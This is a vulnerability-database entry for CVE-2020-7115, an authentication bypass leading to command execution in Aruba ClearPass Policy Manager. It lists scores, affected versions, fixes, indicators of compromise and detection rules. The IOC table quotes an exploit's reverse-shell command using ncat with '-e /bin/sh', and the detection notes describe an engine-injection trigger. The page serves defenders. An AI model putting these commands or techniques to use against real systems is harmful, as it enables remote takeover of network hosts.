cbcvebase.
CVE-2020-7115
published 2020-06-03

CVE-2020-7115: The ClearPass Policy Manager web interface is affected by a vulnerability that leads to authentication bypass. Upon successful bypass an attacker could then…

PriorityP185critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
64.60%
99.1th percentile
The ClearPass Policy Manager web interface is affected by a vulnerability that leads to authentication bypass. Upon successful bypass an attacker could then execute an exploit that would allow to remote command execution in the underlying operating system. Resolution: Fixed in 6.7.13-HF, 6.8.5-HF, 6.8.6, 6.9.1 and higher.

Affected

4 ranges
VendorProductVersion rangeFixed in
arubanetworksclearpass_policy_manager
arubanetworksclearpass_policy_manager6.7.0 – 6.7.13
arubanetworksclearpass_policy_manager>= 6.8.0 < 6.8.66.8.6
arubanetworksclearpass_policy_manager>= 6.9.0 < 6.9.16.9.1

Detection & IOCsextracted from sources · hover to see the quote

urlhttps://<host>:<port>/tips/tipsSimulationUpload.action
path/tmp/clientCertFile*.txt
filenamepayload.so
commandrm -f /tmp/clientCertFile*.txt ; sleep 1 ; ncat $3 $4 -e /bin/sh
  • Monitor for HTTP POST requests to the endpoint /tips/tipsSimulationUpload.action, especially those containing a 'clientPassphrase' field with the value 'req -engine' followed by a path — this is the authentication bypass + engine injection trigger.
  • Alert on file uploads of .so (shared object) files to the ClearPass web interface, particularly to the tipsSimulationUpload.action endpoint, as the exploit delivers a malicious OpenSSL engine as a .so file.
  • Detect creation or presence of files matching the pattern /tmp/clientCertFile*.txt on ClearPass hosts, as the exploit drops the malicious engine payload to this path.
  • Detect outbound ncat/netcat connections spawned from the ClearPass process with the '-e /bin/sh' flag, indicating a reverse shell established post-exploitation.
  • The exploit targets unauthenticated access to the ClearPass web interface — alert on any unauthenticated POST to /tips/tipsSimulationUpload.action as this endpoint should require authentication.
  • ·The exploit specifically requires the malicious OpenSSL engine (.so) to be compiled on RHEL/CentOS 7.x for compatibility with the target ClearPass environment; detections for the .so upload may need to account for this platform-specific artifact.
  • ·Affected versions span multiple branches: ClearPass 6.7.x prior to 6.7.13-HF, 6.8.x prior to 6.8.5-HF, and 6.9.x prior to 6.9.1. Detection rules should not be scoped to only 6.7.0.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.